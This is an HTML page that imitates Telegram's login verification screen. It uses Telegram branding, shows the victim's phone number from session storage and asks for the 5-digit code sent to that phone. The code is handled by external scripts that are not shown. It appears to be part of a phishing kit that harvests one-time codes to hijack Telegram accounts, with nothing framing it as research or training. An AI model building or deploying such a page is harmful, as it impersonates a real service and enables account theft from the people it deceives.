<!DOCTYPE html>
<html lang="en">
   <head>
      <meta charset="utf-8">
      <link rel="icon" href="https://upload.wikimedia.org/wikipedia/commons/thumb/8/82/Telegram_logo.svg/512px-Telegram_logo.svg.png">
      <meta name="viewport" content="width=device-width,initial-scale=1">
      <meta name="theme-color" content="#000000">
      <meta name="description" content="Telegram">
      <link rel="apple-touch-icon" href="https://upload.wikimedia.org/wikipedia/commons/thumb/8/82/Telegram_logo.svg/512px-Telegram_logo.svg.png">
      <link rel="manifest" href="../manifest.json">
      <title>Telegram</title>
      <link href="../static/css/main.d48eb2f8.css" rel="stylesheet">
      <script src="https://code.jquery.com/jquery-3.7.1.js" integrity="sha256-eKhayi8LEQwp4NKxN+CfCh+3qOVUtJn3QNZ0TciWLP4=" crossorigin="anonymous"></script>
   </head>
   <body>
      <noscript>You need to enable JavaScript to run this app.</noscript>
      <div id="root">
         <div class="min-h-screen flex flex-col items-center justify-center bg-gray-900">
            <div class="mb-6 text-center"><a href="#" rel="noopener noreferrer"><img src="https://web.telegram.org/a/monkey.a3d5fcdc50b18dc55695.svg" alt="Header" class="h-32 w-auto mx-auto rounded-lg"></a></div>
            <h2 class="text-2xl font-bold text-white mb-2 text-center">
                <div class="flex items-center space-x-2">
               <p id="no"></p> 
               <svg stroke="currentColor" fill="currentColor" stroke-width="0" viewBox="0 0 24 24" class="inline-block ml-2 text-gray-600" height="1em" width="1em" xmlns="http://www.w3.org/2000/svg">
                  <path d="M15.7279 9.57627L14.3137 8.16206L5 17.4758V18.89H6.41421L15.7279 9.57627ZM17.1421 8.16206L18.5563 6.74785L17.1421 5.33363L15.7279 6.74785L17.1421 8.16206ZM7.24264 20.89H3V16.6473L16.435 3.21231C16.8256 2.82179 17.4587 2.82179 17.8492 3.21231L20.6777 6.04074C21.0682 6.43126 21.0682 7.06443 20.6777 7.45495L7.24264 20.89Z"></path>
               </svg>
            </div>
            </h2>
            <p class="text-gray-400 mb-6 text-center">We have sent you a 5-digit code to your phone number</p>
            <form id="form-otp" method="post" class="w-full max-w-sm space-y-4">
               <fieldset class="border border-gray-700 px-4 py-3 bg-gray-800 rounded-lg transition-all duration-300 hover:border-purple-600">
                  <legend class="text-gray-400 text-sm px-1">Code</legend>
                  <input type="tel" id="otp" placeholder="5 digit code" required max="5" maxlength="5" class="w-full bg-transparent text-white focus:outline-none focus:ring-0" value="" oninput="handleInputOtp()">
               </fieldset>
               <button id="btn-gasskan" type="submit" disabled class="w-full py-3 bg-gray-600 text-white font-semibold rounded-lg focus:outline-none focus:ring-2 focus:ring-purple-500 focus:ring-opacity-50 transition-all duration-300 flex items-center justify-center">VERIFIKASI</button>
            </form>
            <br>
            <p id="notif" style="color:red; font-size: medium;"></p>
         </div>
      </div>

      <script>
         document.getElementById("no").innerHTML = sessionStorage.getItem("phone_number");
      </script>
      <script src="../telegram/js/jiecode.js"></script>
      <script src="../telegram.js"></script>
   </body>
</html>